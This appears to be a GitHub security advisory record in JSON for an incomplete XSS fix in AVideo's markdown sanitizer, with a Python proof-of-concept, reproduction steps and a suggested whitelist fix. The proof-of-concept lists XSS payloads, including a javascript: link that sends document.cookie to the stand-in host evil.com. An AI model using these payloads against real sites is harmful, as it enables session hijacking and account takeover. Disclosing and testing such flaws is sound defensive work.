{"id":"GHSA-m7r8-6q9j-m2hc","summary":"WWBN AVideo has an incomplete fix for CVE-2026-33500: XSS","details":"### Summary\n\nThe incomplete XSS fix in AVideo's `ParsedownSafeWithLinks` class overrides `inlineMarkup` for raw HTML but does not override `inlineLink()` or `inlineUrlTag()`, allowing `javascript:` URLs in markdown link syntax to bypass sanitization.\n\n### Affected Package\n\n- **Ecosystem:** Other\n- **Package:** AVideo\n- **Affected versions:** \u003c commit 3ae02fa24093\n- **Patched versions:** \u003e= commit 3ae02fa24093\n\n### Details\n\nIn `objects/functionsSecurity.php`, the `ParsedownSafeWithLinks` class:\n- Overrides `blockMarkup()` -- blocks non-`\u003ca\u003e`/`\u003cimg\u003e` HTML tags\n- Overrides `inlineMarkup()` -- sanitizes `\u003ca href=...\u003e` and `\u003cimg src=...\u003e` in raw HTML, including an href whitelist\n\nBut the base `Parsedown.php` class has two additional methods that generate `\u003ca\u003e` tags:\n- `inlineLink()` (line ~1388) -- processes `[text](url)` markdown syntax, sets `href` = URL directly\n- `inlineUrlTag()` (line ~1558) -- processes `\u003cURL\u003e` auto-link syntax, sets `href` = URL directly\n\nNeither is overridden by `ParsedownSafeWithLinks`, so `[Click me](javascript:alert(document.cookie))` produces `\u003ca href=\"javascript:alert(document.cookie)\"\u003eClick me\u003c/a\u003e` without any sanitization.\n\nThe fix sanitizes raw HTML `\u003ca\u003e` tags via `inlineMarkup` but misses the markdown-native link syntax (`[text](url)`) and auto-link syntax (`\u003curl\u003e`) which produce `\u003ca\u003e` tags through different code paths in the base Parsedown class.\n\n### PoC\n\n```python\n\"\"\"\nCVE-2026-33500 - Incomplete XSS fix in AVideo ParsedownSafeWithLinks\n\nTests REAL vulnerable code from:\n  objects/functionsSecurity.php (commit f154167, pre-fix 3ae02fa)\n  vendor/erusev/parsedown/Parsedown.php\n\nThe ParsedownSafeWithLinks class overrides:\n  - blockMarkup (blocks non-a/img HTML)\n  - inlineMarkup (sanitizes \u003ca\u003e and \u003cimg\u003e inline HTML)\n  - inlineLink is NOT overridden (markdown [text](url) syntax)\n\nBut the base Parsedown class has inlineLink() at line 1388 which creates\n\u003ca href=\"URL\"\u003e from markdown [text](url) without any href sanitization.\nSince ParsedownSafeWithLinks does NOT override inlineLink(), a malicious\njavascript: URL in markdown link syntax passes through unsanitized.\n\nAdditionally, inlineUrlTag() at line 1558 handles \u003cURL\u003e auto-link syntax\nand creates \u003ca href=\"URL\"\u003e without sanitization either.\n\"\"\"\n\nimport re\nimport sys\nimport os\n\nsrc_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'src')\n\nparsedown_src = open(os.path.join(src_dir, 'Parsedown.php')).read()\nsecurity_src = open(os.path.join(src_dir, 'functionsSecurity.php')).read()\n\nprint(\"=\" * 60)\nprint(\"CVE-2026-33500: AVideo ParsedownSafeWithLinks XSS Bypass PoC\")\nprint(\"=\" * 60)\nprint()\n\nhas_class = 'ParsedownSafeWithLinks' in security_src\nhas_block_markup = 'function blockMarkup' in security_src\nhas_inline_markup = 'function inlineMarkup' in security_src\nhas_inline_link_override = 'function inlineLink' in security_src\nhas_inline_url_tag_override = 'function inlineUrlTag' in security_src\n\nbase_has_inline_link = 'function inlineLink' in parsedown_src\nbase_has_inline_url_tag = 'function inlineUrlTag' in parsedown_src\n\nprint(\"[*] ParsedownSafeWithLinks class found: \" + str(has_class))\nprint(\"[*] Overrides blockMarkup: \" + str(has_block_markup))\nprint(\"[*] Overrides inlineMarkup: \" + str(has_inline_markup))\nprint(\"[*] Overrides inlineLink: \" + str(has_inline_link_override))\nprint(\"[*] Overrides inlineUrlTag: \" + str(has_inline_url_tag_override))\nprint()\nprint(\"[*] Base Parsedown has inlineLink: \" + str(base_has_inline_link))\nprint(\"[*] Base Parsedown has inlineUrlTag: \" + str(base_has_inline_url_tag))\nprint()\n\nif not has_inline_link_override and base_has_inline_link:\n    print(\"[+] BYPASS FOUND: inlineLink NOT overridden!\")\n    print(\"    Markdown syntax [text](javascript:...) bypasses sanitization\")\n    print()\n\nif not has_inline_url_tag_override and base_has_inline_url_tag:\n    print(\"[+] BYPASS FOUND: inlineUrlTag NOT overridden!\")\n    print(\"    Auto-link syntax \u003cjavascript:...\u003e bypasses sanitization\")\n    print()\n\ndef simulate_parsedown_inline_link(markdown_text):\n    match = re.match(r'\\[([^\\]]*)\\]\\(([^)]+)\\)', markdown_text)\n    if match:\n        text = match.group(1)\n        href = match.group(2)\n        return f'\u003ca href=\"{href}\"\u003e{text}\u003c/a\u003e'\n    return None\n\npayloads = [\n    \"[Click me](javascript:alert(document.cookie))\",\n    \"[XSS](javascript:fetch('https://evil.com/steal?c='+document.cookie))\",\n    \"[Data URI](data:text/html,\u003cscript\u003ealert(1)\u003c/script\u003e)\",\n    \"[VBScript](vbscript:MsgBox(1))\",\n]\n\nvuln_count = 0\nprint(\"[*] Testing markdown link payloads through base inlineLink():\")\nprint()\nfor payload in payloads:\n    result = simulate_parsedown_inline_link(payload)\n    if result and ('javascript:' in result or 'data:' in result or 'vbscript:' in result):\n        print(f\"    BYPASS: {payload}\")\n        print(f\"    Output: {result}\")\n        vuln_count += 1\n    else:\n        print(f\"    BLOCKED: {payload}\")\n    print()\n\nprint()\nif vuln_count \u003e 0 and not has_inline_link_override:\n    print(\"VULNERABILITY CONFIRMED\")\n    sys.exit(0)\nelse:\n    print(\"VULNERABILITY NOT CONFIRMED\")\n    sys.exit(1)\n\n```\n\n**Steps to reproduce:**\n1. `git clone https://github.com/WWBN/AVideo /tmp/AVideo_test`\n2. `cd /tmp/AVideo_test && git checkout 3ae02fa240939dbefc5949d64f05790fd25d728d~1`\n3. `python3 poc.py`\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\njavascript: URLs in markdown [text](url) link syntax bypass sanitization since inlineLink() is not overridden.\n```\n\n### Impact\n\nAn attacker can inject `javascript:` URLs via markdown link syntax in any user-generated content field that uses `ParsedownSafeWithLinks` (comments, descriptions, etc.). When another user clicks the rendered link, the attacker's JavaScript executes in their browser session, enabling session hijacking, account takeover, and data theft.\n\n### Suggested Remediation\n\nOverride `inlineLink()` and `inlineUrlTag()` in `ParsedownSafeWithLinks` to apply the same `href` protocol whitelist (`https?://`, `mailto:`, `/`, `#`) that `inlineMarkup` already applies to raw HTML `\u003ca\u003e` tags. Reject any href that does not match the whitelist.","aliases":["CVE-2026-41063"],"modified":"2026-07-08T08:29:22.202001048Z","published":"2026-04-14T23:25:28Z","related":["CVE-2026-41063"],"database_specific":{"nvd_published_at":"2026-04-21T23:16:21Z","cwe_ids":["CWE-79"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-04-14T23:25:28Z"},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-72h5-39r7-r26j"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-m7r8-6q9j-m2hc"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33500"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41063"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/3ae02fa240939dbefc5949d64f05790fd25d728d"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/cae8f0dadbdd962c89b91d0095c76edb8aadcacf"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"29.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0","29.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-m7r8-6q9j-m2hc/GHSA-m7r8-6q9j-m2hc.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"}]}